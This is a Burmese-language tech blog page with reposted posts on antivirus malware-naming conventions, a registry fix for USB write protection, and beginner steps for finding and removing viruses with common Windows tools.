Virus-namingAntivirus တွေက ဗိုင်းရပ်စ်တွေကို နာမည်ပေးပုံတွေက တစ်ခုနဲ့တစ်ခု မတူကြပါဘူး။ ဒါပေမဲ့ Format တွေတော့ တူကြပါတယ်။ သူတို့ကတော့ Virus တွေ Worm တွေအားလုံးကို Malware သို့မဟုတ် Threat လို့ သတ်မှတ်ကြပါတယ်။ Format လေးတွေကို သိထားခြင်းအားဖြင့် အနည်းဆုံးတော့ Win32 ဗိုင်းရပ်စ်ဝင်လို့ဗျာဆိုတဲ့ အပြောအဆိုအမှားတွေကို ရှောင်ကြဉ်နိုင်ပါလိမ့်မယ်။ ဒီဆောင်းပါးမှာတော့ Microsoft Security Essential အနေနဲ့ Malware တွေကို နာမည်ပေးတဲ့ ပုံစံလေးကို ရှင်းပြထားပါတယ်။
ဒီပုံလေးမှာတော့ Malware တစ်ခုရဲ့ နာမည်အပြည့်အစုံကို ဖော်ပြထားပါတယ်။
Naming-conv
ရှေ့ဆုံးက Worm ဆိုတာက Malware အမျိုးအစားကို ပြောတာပါ။ အဲဒီနေရာမှာ Worm လည်း ဖြစ်နိုင်တယ်၊ Virus လို့လည်း ပြနိုင်ပါတယ်။ Malware အမျိုးအစားတွေကတော့ အောက်မှာပြထားသလို အများကြီးပါ။
Adware
Backdoor
Behavior
BrowserModifier
Constructor
DDoS
Dialer
DoS
Exploit
HackTool
Joke
MonitoringTool
Program
PWS
RemoteAccess
Rogue
SettingsModifier
SoftwareBundler
Spammer
Spoofer
Spyware
Tool
Trojan
TrojanClicker
TrojanDownloader
TrojanDropper
TrojanProxy
TrojanSpy
VirTool
Virus
Worm
Type ရဲ့နောက်မှာ ထိခိုက်နိုင်တဲ့ Platform နာမည်ကို သတ်မှတ်ပါတယ်။ Win32 ဆိုရင် 32bit Windows မှန်သမျှကို ဒုက္ခပေးနိုင်ပါတယ်။ 64bit Windows တွေကို မထိခိုက်ပါဘူး။ Win95 လို့ဆိုရင်တော့ Windows 95 ကိုပဲ ထိခိုက်ပါလိမ့်မယ်။ ဥပမာအားဖြင့် နာမည်ကြီး ချန်နိုဘိုင်းဗိုင်းရပ်စ်ဟာ Win95 ဖြစ်တဲ့အတွက် Windows XP, 7 မှာ ချန်နိုဘိုင်းဝင်ရင် ဘာမှဖြစ်မှာမဟုတ်ပါဘူး။ ရှိတဲ့ Platform နာမည်တွေ အတိုကောက်နဲ့ ရှင်းလင်းချက်တွေကတော့ အောက်မှာပြထားတဲ့အတိုင်းပါပဲ။
AndroidOS Android OS
DOS MS-DOS platform
EPOC Psion devices
FreeBSD FreeBSD platform
iPhoneOS iPhone OS
Linux Linux platform
MacOS MAC 9.x platform or earlier
MacOS_X MacOS X or later
OS2 OS2 platform
Palm Palm OS
Solaris System V-based Unix platforms
SunOS Unix platforms 4.1.3 or lower
SymbOS Symbian OS
Unix general Unix platforms
Win16 Win16 (3.1) platform
Win2K Windows 2000 platform
Win32 Windows 32-bit platform
Win64 Windows 64-bit platform
Win95 Windows 95, 98 and ME platforms
Win98 Windows 98 platform only
WinCE Windows CE platform
WinNT Windows NT platform
ဟော လာပါပြီ။ နောက်မှာပါတဲ့ Taterf ဆိုတာကမှ တကယ့်ဗိုင်းရပ်စ်ရဲ့ နာမည်ဖြစ်ပါတယ်။ Family name လို့လည်း ခေါ်ပါတယ်။ နောက်က .K ဆိုတာကတော့ ဗိုင်းရပ်စ်ရဲ့ variant ပါ။ variant က A ကနေ Z ထိတင်မကပဲ AA ကနေ ZZ ထိ စသည်ဖြင့် ရှိပါတယ်။ variant ကွဲရင် ဗိုင်းရပ်စ်ရဲ့ တိုက်ခိုက်ပုံချင်းကလည်း အနည်းငယ်ကွဲပြားပါတယ်။
နောက်ဆုံးက dll ကတော့ suffix လို့ခေါ်ပြီး ပိုပြီးအသေးစိတ်အောင် ထည့်ပေးထားဖြင့်ဖြစ်ပါတယ်။ dll ဖိုင်တွေကို အဓိက ကူးစက်မယ်ဆိုတဲ့ သဘောပါ။
ဒီလောက်ဆိုရင် ကိုယ့်ကွန်ပျူတာထဲ ၀င်တဲ့ဗိုင်းရပ်စ်ရဲ့ နာမည်ကို ဘယ်လိုခေါ်မလဲဆိုတာ ခွဲခြားနိုင်သွားလိမ့်မယ်လို့ ယူဆပါတယ်။ ဒါပေမဲ့ ဗိုင်းရပ်စ်ရဲ့ နာမည်ကို သိပြီးတဲ့နောက်မှာ အဲဒီ ဗိုင်းရပ်စ်ရဲ့ အပြုအမူကို အင်တာနက်မှာ ရှာပြီး ဆက်လေ့လာပါလို့ တိုက်တွန်းပါရစေ။ ဗိုင်းရပ်စ်ဖိုင်ကို ဖျက်ပစ်တာ၊ ဒါမှမဟုတ် ဗိုင်းရပ်စ်ကပ်နေတဲ့ ဖိုင်တွေအားလုံးကို ဖျက်ပစ်တာဟာ ဗိုင်းရပ်စ်ကို သတ်ရုံလေးပဲ သတ်တာပါ။ အဲဒီ ဗိုင်းရပ်စ်က ဖျက်ဆီးသွားတဲ့ ခြေရာလက်ရာတွေကိုတော့ ပြင်ဆင်ပြီးသား ဖြစ်မှာမဟုတ်ပါဘူး။ သူ ပြင်ဆင်သွားတဲ့ Registry၊ Modify လုပ်သွားတဲ့ system files တွေ စသည်ဖြင့်ပါ။ နဂိုအတိုင်းပြန်ဖြစ်အောင် ပြုလုပ်နိုင်မှ ကိုယ့်ကွန်ပျူတာက အကောင်းအတိုင်း သုံးနိုင်ပါလိမ့်မယ်။ နာမည်ကို သိရင် အဲဒီဗိုင်းရပ်စ်တွေရဲ့ အပြုအမူကို Google မှာ ရှာဖွေနိုင်သလို www.symantec.com မှာလည်း ရှာဖွေနိုင်ကြောင်းပါ။
credit: itmen

အပြည့်အစုံ

Thursday, 7 October 2010

USB Devices တွေရဲ့ Write Protection ကိုဖြေရှင်းခြင်း

အားလုံးမင်္ဂလာပါခင်ဗျာ။ ကျွန်တော် ဒီပို့စ်လေးကို ရေးဖို့ စဉ်းစားနေတာတော့ ကြာပါပြီ။ အလုပ်တွေနဲ့ မအားလပ်လို့ မရေးဖြစ်ခဲ့တာပါ။ အခုတော့ မိတ်ဆွေ တွေက မကြာခဏ မေးမြန်းလာကြလို့ ရေးလိုက် တာပါ။ 

USB Devices (USB Pen Drive, Flash Drive, Memory Card . etc) တွေဟာ ကျွန်တော်တို့ အရင်က သုံးခဲ့တဲ့ Floppy Disk တွေလို physically အရ write protection  လုပ်လို့မရပါဘူး။ အခု အပေါ်မှာ ပြထားတဲ့ ပုံတွေလို ဖြစ်တာဟာ Virus တစ်မျိုးမျိုးကြောင့်ဖြစ်နိုင်ပါတယ်။ ဒီပြဿနာကို ဖြေရှင်းဖို့အတွက် အောက်က အဆင့်တွေအတိုင်း လိုက်လုပ်ကြည့်ကြပါ..။ 

၁။     Start မှ Run ကိုသွားပါ။ box ထဲမှာ regedit လို့ ရိုက်ထည့်ပြီး enter ခေါက်လိုက်ပါ။ အောက်ကပုံလို Registry Editor ပေါ်လာပါလိမ့်မယ်။


၂။   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies အဆင့်ဆင့် သွားပါ။ Control အောက်မှာ StorageDevicePolicies ဆိုတာမရှိရင် အဲဒီ Key ကို ထည့်ပေးဖို့ လိုပါတယ်။ ဒီအဆင့်က အရေးကြီးတဲ့အတွက် သေချာလိုက်လုပ်ဖို့လိုပါတယ်။ နည်းလမ်း(၂)မျိုးနဲ့ အဲဒီ Key ကို ဖန်းတီးလို့ရပါတယ်။
  • ပထမနည်းကတော့ အထက်ပါအတိုင်း အဆင့်ဆင့်သွားပြီး Control ကိုကလစ်လိုက်ရင် ညာဖက် အကွက်မှာ Key တွေ ပေါ်လာပါလိမ့်မယ်။ အဲဒါတွေရဲ့ အောက်ဖက် လွတ်တဲ့နေရာမှာ Right-click လုပ်၊ New--> Key ကိုကလစ်လိုက်ရင် ဘယ်ဘက်မှာ Folder rename ပုံစံနဲ့တွေ့ပါမယ်။ အဲဒီမှာ Key ရဲ့အမည်ကို StorageDevicePolicies လို့ရိုက်ထည့်ပေးပါ (စာလုံးပေါင်းမှားလို့မရတဲ့အတွက် သေချာဂရုစိုက်ပြီးရိုက်ထည့်ပေးပါ)။ ပြီးရင် enter ခေါက်လိုက်ပါ။ StorageDevicePolicies ကို ဖန်တီးပြီးသွားပါပြီ။
  • ဒုတိယနည်းကတော့ add.bat ဆိုတဲ့ batch ဖိုင်လေးကို ဒီနေရာမှာ ဒေါင်းလုပ်ယူပြီး အဲဒီဖိုင်ကို Double-click လုပ်လိုက်ပါ။ အလိုအလျောက် StorageDevicePolicies ကို ဖန်တီးပြီးသား ဖြစ်သွားပါလိမ့်မယ်။

၃။   အဲဒီဖန်တီးပြီးသွားတဲ့ StorageDevicePolicies ကိုကလစ်လုပ်ပါ။ ညာဘက်အကွက်က လွတ်နေတဲ့ နေရာမှာ Right-click--->New--->DWORD Value အဆင့်ဆင့်သွားပါ။ New Value မှာ WriteProtect လို့ အမည်ပေးလိုက်ပါ။ 

၎။   ပြီးရင် အဲဒီ WriteProtect ကို Double-click လုပ်ပြီး သူ့ရဲ့တန်ဖိုးကို "0" လို့ပြောင်းလိုက်ပါ။



၅။   Registry Editor ကိုပိတ်ပြီး ကွန်ပျူတာကို Restart ချလိုက်ပါ။ အားလုံးအဆင်ပြေကြပါစေ ခင်ဗျာ..။
 
မလေးရောက်မြန်မာ ဆီက ကူးယူဖော်ပြပါသည်။

အပြည့်အစုံ

Sunday, 19 September 2010

Computer ထဲက Virus တွေကို ဖျက်မယ်

တကယ်တမ်း ကွန်ပျူတာ ဗိုင်းရပ်စ် တွေကို ရှင်းလင်းရတယ်ဆိုတာ လွယ်ကူတဲ့ကိစ္စမဟုတ်သလို မိမိရဲ့ အဖိုးတန်တဲ့ အချိန်တချို့ကို ပေးဆပ်ကြရတာပါ။ ဘယ်ကွန်ပျူတာမှ Virus တစ်မျိုးတည်း ရတယ်ဆိုတာ မရှိပဲနဲ့ မိမိရဲ့အိမ်မှာ ပုရွက်ဆိတ်လေးတွေ ၀င်လာသလိုပါပဲ နောက်ဆုံး တပ်စုကြီးနဲ့ပဲ ပြန်လည် ထွက်ခွာသွားကြတာပါ။ Antivirus ဆိုတာ အကောင်းမွန်ဆုံး ကာကွယ်ရေး တပ်ဖွဲ့ကြီးဖြစ်တယ် သို့ပေမယ့်လည်း ၄င်း Antivirus က out of date ဖြစ်နေမယ်ဆိုရင် အသုံးဝင်တဲ့ antivirus program တစ်ခုဖြစ်လာမှာ မဟုတ်ပါဘူး။ ဒီတော့ virus တွေကို ခုခံတိုက်ခိုက်ဖို့၊ virus ရှိမရှိဆိုတာ သိဖို့အတွက် သံသယဖြစ်ဖွယ်ရာ processing တွေ၊ ဖိုင်တွေကို သိဖို့လိုပါတယ်။ ဒီလို ဒုက္ခပေးနိုင်တဲ့ virus တွေကို config, taskmanager နဲ့ autoruns tools တွေနဲ့ ရှာဖွေကြရတယ်။ ဒါကြောင့် သံသယ ဖြစ်ဖွယ် process တွေကို မိတ်ဆွေတို့အနေဲ့ ရှာတော့မယ်ဆိုရင် ဒီ file က ဘယ်ကလာတာလဲ၊ registry keys တွေအတွက် လေးလံစေတဲ့ ဖိုင်တွေလား၊ ဘယ်လို services တွေကို အသုံးပြုနေလဲ၊ ဘယ် startup program တွေထဲမှာ ဘယ်လိုဖိုင်တွေအနေနဲ့ ၀င်ရောက် အသုံးပြုနေလဲဆိုတာကို သိဖို့လိုပါတယ်။ အကယ်၍များ virus ကို ရှင်းလင်းလိုက်ဖို့ ၂ နာရီလောက် အချိန်ကြာမယ်ဆိုရင် အဲ့လိုရှင်းလင်းလိုက်ဖို့ထက် Operating System ကိုပြန်လည်၍ အသစ်တင်လိုက်မည်ဆိုသော အချက်နဲ့ ညှိနှိုင်းရပါလိမ့်မယ်။ ဒါက အချိန်ကုန်မခံစေချင်တဲ့အတွက် ကြောင့်ပင်ဖြစ်သည်။

Virus ရဲ့ အဓိပ္ပါယ်။...

အရိုးရှင်းဆုံး ဝေါဟာရတစ်ခုအနေနဲ့ Computer Virus ဆိုတာ သူကိုယ်တိုင် ဖိုင်တစ်ခုကို ဖန်တီးနိုင်တယ် ကူးယူနိုင်တယ်။ လုံခြုံရေး ဆိုင်ရာ program တွေကို စိန်ခေါ် ခြိမ်းခြောက်နိုင်တဲ့ အစွမ်းတွေရှိတယ်။ တစ်ချို့ virus တွေက သတ်မှတ်ထားတဲ့ ဖိုင်တွေကို delete လုပ်နိုင်တယ်၊ တစ်ချို့က user တွေ ကွန်ပျူတာရဲ့ password နဲ့ information တွေကို ခိုးယူနိုင်တယ်။ တစ်ချို့ကြပြန်တော့ မိမိရဲ့ ကွန်ပျူတာကို OS တက်မလာလောက်အောင် ဖျက်စီးမှု့လုပ်နိုင်ကြတယ်။
အကြမ်းဖျင်းအားဖြင့် -
Virus = ကိုယ်တိုင် copy ကူးယူနိုင်သော file တစ်ခု
Trojan = virus သို့မဟုတ် malware တွေပါဝင်သော program တစ်ခု
Spyware = ကွန်ပျူတာ ကိုထိန်းချူပ်ခွင့်ရရန် သိုမဟုတ် ကြားဖေါက်ဝင်ရောက်နိုင်အောင် ဖန်တီးထားတော့ ဖိုင် သို့မဟုတ် program တစ်ခု
Maleware = ကွန်ပျူတာအား ပိုင်ရှင်၏ ခွင့်ပြုချက်မရပဲ ပျက်စီးရာ ပျက်စီးကြောင်း ဖန်တီးနိုင်သော program
Worm = Network အပေါ်မှာ လမ်းသလားသော virus

Virus ဖယ်ရှားခြင်း။
မိမိကွန်ပျူတာမှာ virus ရှိသည်ဟု ယူဆပါက Up to Date ဖြစ်နေသော Antivirus program တွေနဲ့ စစ်ဆေးပေးပါ။ Antivirus program က detect သိလို့ ဖယ်ရှားနိုင်တယ်ဆို ရင်တော့ ကံကောင်းတာပေါ့။ AV တွေ Detect သိတယ်.. Remove မလုပ်နိုင်တော့ဘူးဆိုရင်တော့ ဖြစ်နေတဲ action နဲ့ file ကို မှတ်သားထားပါ .. ပြီးရင် Search Engine မှာ ၄င်းဖိုင် နဲ့ ၄င်း virus ရဲ့ ဒုက္ခပေးပုံတွေကို ပြောဆို အကူအညီတောင်းပါ။ ပြီးလျင်လမ်းညွန်အတိုင်းဖြေရှင်းမှာ။ ဖြေရှင်းမှု့မလုပ်ခင်တိုင်းမှာ မိမိရဲ့ အရေးကြီးတဲ့ ဖိုင်တွေကို backup လုပ်ထားပါ။

Virus Detect မသိခဲ့ရင်
ကွန်ပျူတာမှာ AntiVirus / AntiSpyware program တွေအနေနဲ့ Detect မသိဘူး သို့သော် ကွန်ပျူတာက အရင်အတိုင်းပဲ နှေးမြဲနှေးနေမယ်ဆိုရင်တော့ background processes တွေကို ကြည့်ရပါလိမ့်မယ်။ ဒီအတွက် special tool လေးတွေက အဓိက တာဝန်ထမ်းဆောင်ရလိမ့်မယ်။ ဥပမာ :- task manager, autoruns, process explorer and hijackthis တို့လိုပေါ့။

Checking Running Processes
ကျွန်တော်တို့ PC တစ်လုံး Error ဖြစ်တယ်ဆိုရင် ပထမဦးဆုံးအကြိမ် task manager (Ctrl + Alt+ Del) ကို ခေါ်ကြည့်တယ်. ပြီးရင် ဘယ်လို file နဲ့ services တွေ Run နေလဲ Memory usage တွေဘယ်လောက်များများကို ဘယ်လို file တွေက အသုံးပြုနေလဲဆိုတာကိုကြည့်မယ်။ ပြီးရင် System Configuration Ultility (RUN>msconfig) က နေဘယ် serivces တွေ နဲ့ ဘယ်ဖိုင်တွေက Operating System (Windows ) startup မှာ ၀င်ရောက်နေလဲဆိုတာကိုပါကြည့်ပါ။အကယ်၍ starup မှာ ထူးထူးခြားခြား file အမည်လေးတွေနဲ့ ၀င်နေတာတွေ့ရင်


တို့မှာသွားပြီး ဖိုင်အမည်ကို ရိုက်ထည့်စစ်ဆေးကြည့်ပါ။ ဘာကြောင့်လဲဆိုတော့ တစ်ချို့ ဖိုင်တွေက system file တွေနဲ့ပုံစံတူတွေဖြစ်နေတတ်တယ်။ မိမိကွန်ပျူတာအတွက် အရေးမပါတဲ့ processes တွေကို end လုပ်ပါ။

System Configuration Utility


RUN dialog box မှာ msconfig ဆိုပြီးတော့ ရိုက်ထည့်လိုက် ပြီးရင် System Configuration Utility ဆိုတာပေါ်လာမယ်... ဒါကတော့ Microsoft Windows မှာဆိုရင် အကောင်းဆုံး ကွန်ပျူတာကိုပြင်ဆင်မှု့ပိုင်းမှာ အထောက်အကူပြုတဲ့ utility ပဲဖြစ်တယ်။ နောက်ဆုံး ဘာမှမသိဘူးပဲထား startup tab မှာ Disable All ဆိုတာကို နိုပ်မယ်။ နောက် Services tab မှာ Hide All Microsoft Services ဆိုတာကို အမှန်ခြစ်မယ်. ပြီးရင် Disable All ဆိုပြီးနိုပ် restart လုပ်လိုက်ရင် မိမိရဲ့ ကွန်ပျူတာ system ဟာပုံမှန်ထက်သိသိသာသာကို ကောင်းမွန်လာတာကိုတွေ့ရလိမ့်မယ်။ ဒီပုံစံနဲ့ တစ်ခါတစ်လေ ဘာ error မှန်းမသိ (အထူးသဖြင့် Software Conflict ဖြစ်၍ windows normal ၀င်မရခြင်း) တဲ့ ပြဿနာတွေကို F8 နိုပ်ကာ Safe Mode ထဲကနေ ပြင်ပြီးသုံးသွားရင်တောင် အဆင်ပြေပါတယ်။

All-in-one diagnostic Tools
Autoruns


ဒီ software က Task manager, msconfig and the services list တွေ စသည့် system diagnostic အစုံပါတဲ့ freeware လေးတစ်ခုပါ။

Process Explorer

ဒါလေးကတော့ အပေါ်က ပုံစံပါပဲ.. သူ့ရဲ့ ထူးခြားချက်ကတော့ file တစ်ခုခြင်းစီအတွက် ကိုယ်ပိုင် ထိန်းချုပ်မှု့ပါ၊ CPU,IO,VM တွေအပြင် performace graphed တွေပါတယ်။

Hijack This

Technician တွေနဲ့ ကွန်ပျူတာ နဲ့နည်းစပ်သူတွေတော်တော်တော်များများသိကြတဲ့ Tool ပါ။ ဒါပေမဲ့ ၄င်းတို့မှာ ပါဝင်တဲ့ R0,R1,R2,R3 / F0,F1,F2,F3 / 01 / 04 / 23 စသည့် notable entries လေးတွေကို သတိမထားမိတတ်ပါဘူး။ R0,R1,R2,R3 ဆိုတာက အင်တာနက် အွန်လိုင်း အမှားအယွင်းတွေ၊ အထူးသဖြင့် Internet Browser တွေပေါ့... အသေးစိတ်ကို


Malware Bytes

Antivirus Program တွေက ၄င်းတို့ရဲ့ Virus Signiture တွေနဲ့ငြိတဲ့ ဖိုင်တွေကို စစ်မယ်၊ Anti Spyware တွေက Registry Entries မှာ ၄င်းတို့ Spyware အဖြစ်သတ်မှတ်ထားတဲ့ ဖိုင်တွေကို စစ်မယ်။ ဒါပေမဲ့ တစ်ချို့ malware တွေကို antivirus တွေ antispyware တွေ Detect သိသော်ငြားလည်း သူတို့ကို Delete မလုပ်ဘူး( Delete လုပ်ဖို့လည်း သူတို့မှာ Power မရှိသလို၊ System File လား၊ ဘာလား မခွဲခြားနိုင်ခြင်း၊ ၄င်း malware တွေနဲ့ familiar ဖြစ်နေခြင်း)။ (မှတ်ချက် - တစ်ချို့ Antivirus program တွေက အဲ့လို malware ရရင် တွေ့သမျှ အကုန်ဖျက်ပါတယ်...ဘာဖိုင်မှကိုမထားပါဘူး။ ပြီးရင်တော့ စက်တောင် မတက်တော့ဘူး။ မိမိရဲ့ ကွန်ပျူတာက malware ကိုက်လို့ ဘာမှမဖြစ်ပဲနဲ့ Antivirus run လိုက်မှ နောက်ဆုံး ရှိတဲ့ ဖိုင်လေးတွေပါ အကုန်ပြောင်သွားတတ်ပါတယ်။) ဒါကြောင့် ၄င်း malware တွေက မိမိရဲ့ Running System နဲ့ Applications တွေကို နည်းမျိုးစုံနဲ့ဒုက္ခပေး၊ application သုံးနေရင်းနဲ့ ရုတ်တရက်ပိတ်၊ error ကျ အဲ့လိုတွေ ဖြစ်လာတတ်တယ်။ ဒီအတွက် Maleware Bytes ဆိုတဲ့ software လေးက အဆင်ပြေဆုံးပါ။

အိမ်လွမ်းသူ ဆီမှ ကူးယူဖော်ပြသည်။

အပြည့်အစုံ